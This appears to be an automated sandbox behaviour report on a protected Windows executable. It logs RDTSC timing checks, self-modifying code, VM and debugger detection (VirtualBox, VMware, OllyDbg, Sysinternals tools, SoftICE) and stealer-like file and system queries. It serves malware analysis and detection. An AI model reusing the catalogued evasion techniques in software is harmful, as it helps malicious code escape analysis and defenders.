                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F805 second address: B1F817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a js 00007F374CE66326h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F817 second address: B1F837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 jmp 00007F374C500086h 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21500 second address: B2150A instructions: 0x00000000 rdtsc 0x00000002 js 00007F374CE66326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2150A second address: B2150F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B26A3F second address: B26A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374CE6632Bh 0x00000009 jmp 00007F374CE6632Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DF1C second address: B2DF36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F374C500080h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DF36 second address: B2DF3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DF3A second address: B2DF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F374C500081h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DF53 second address: B2DF57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C768 second address: B2C796 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F374C50007Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F374C500078h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 jmp 00007F374C500080h 0x0000001d pop eax 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C915 second address: B2C91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CA83 second address: B2CAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F374C500082h 0x0000000f jmp 00007F374C50007Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CAAE second address: B2CACB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F374CE66332h 0x00000008 pushad 0x00000009 jns 00007F374CE66326h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CEC4 second address: B2CEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F374C500084h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CEE3 second address: B2CEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CEE9 second address: B2CEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D08A second address: B2D09A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F374CE66326h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DC72 second address: B2DC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DC79 second address: B2DC7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DC7F second address: B2DC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41DEC second address: B41E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F374CE66326h 0x0000000a jmp 00007F374CE66338h 0x0000000f jmp 00007F374CE66331h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E24 second address: B41E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E2A second address: B41E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E2E second address: B41E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E32 second address: B41E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41C33 second address: B41C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F374C50007Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41C47 second address: B41C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F374CE66326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F374CE66330h 0x00000011 jmp 00007F374CE66331h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F374CE6632Ch 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B506FC second address: B5070A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F374C500076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5070A second address: B5070E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5070E second address: B50729 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500087h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50729 second address: B5072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5072F second address: B50762 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F374C50007Ch 0x00000008 pop esi 0x00000009 push edi 0x0000000a jmp 00007F374C500089h 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50762 second address: B50768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50768 second address: B50784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500086h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53271 second address: B53281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F374CE6632Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53281 second address: B53287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53287 second address: B53297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F374CE66326h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52F7A second address: B52F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52F80 second address: B52F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62E71 second address: B62E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62E75 second address: B62E92 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F374CE66330h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62E92 second address: B62E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62E96 second address: B62EA0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F374CE66326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61FB6 second address: B61FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61FBF second address: B61FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61FC3 second address: B61FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F374C500080h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6229A second address: B622A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B622A0 second address: B622CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F374C50007Dh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F374C500081h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62A05 second address: B62A28 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F374CE66333h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F374CE6632Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65840 second address: B6584A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F374C500076h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65AA8 second address: B65AC3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F374CE6632Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007F374CE66334h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65AC3 second address: B65AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65AC7 second address: B65B15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 movsx edx, ax 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F374CE66328h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 cld 0x00000027 push 21A08A8Dh 0x0000002c push eax 0x0000002d push edx 0x0000002e jo 00007F374CE6633Eh 0x00000034 jmp 00007F374CE66338h 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65B15 second address: B65B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F374C500076h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65D55 second address: B65D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65D5C second address: B65DE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D26A5h], ebx 0x00000012 push dword ptr [ebp+122D1BA1h] 0x00000018 mov dl, ah 0x0000001a call 00007F374C500079h 0x0000001f jmp 00007F374C50007Dh 0x00000024 push eax 0x00000025 pushad 0x00000026 jmp 00007F374C50007Fh 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e pop edx 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 jmp 00007F374C500082h 0x00000039 mov eax, dword ptr [eax] 0x0000003b pushad 0x0000003c pushad 0x0000003d push edi 0x0000003e pop edi 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 jmp 00007F374C50007Bh 0x00000047 popad 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c jc 00007F374C500084h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65DE7 second address: B65DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A80C second address: B6A816 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F374C500076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A816 second address: B6A81C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A81C second address: B6A820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302B6 second address: 53302BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302BB second address: 53302C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302C1 second address: 53302C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302C5 second address: 53302C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302C9 second address: 5330313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c pushfd 0x0000000d jmp 00007F374CE66334h 0x00000012 or cx, E168h 0x00000017 jmp 00007F374CE6632Bh 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F374CE66334h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53303FF second address: 5330404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330404 second address: 5330409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8604D second address: A86051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8E18C4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A7E2C6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B035F3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00694910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0068DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0068E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00694570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, | 0_2_00694570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, | 0_2_0068ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, | 0_2_0068BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0068DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_006816D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00693EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, | 0_2_00693EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0068F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00681160 GetSystemInfo,ExitProcess, | 0_2_00681160
Source: file.exe, file.exe, 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767079494.00000000014E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13574
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13559
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13562
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13613
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13582
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006845C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_006845C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00699860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00699860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00699750 mov eax, dword ptr fs:[00000030h] | 0_2_00699750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00697850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, | 0_2_00697850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00699600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, | 0_2_00699600
Source: file.exe, file.exe, 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: xXeProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, | 0_2_00697B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00696920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, | 0_2_00696920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00697850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, | 0_2_00697850
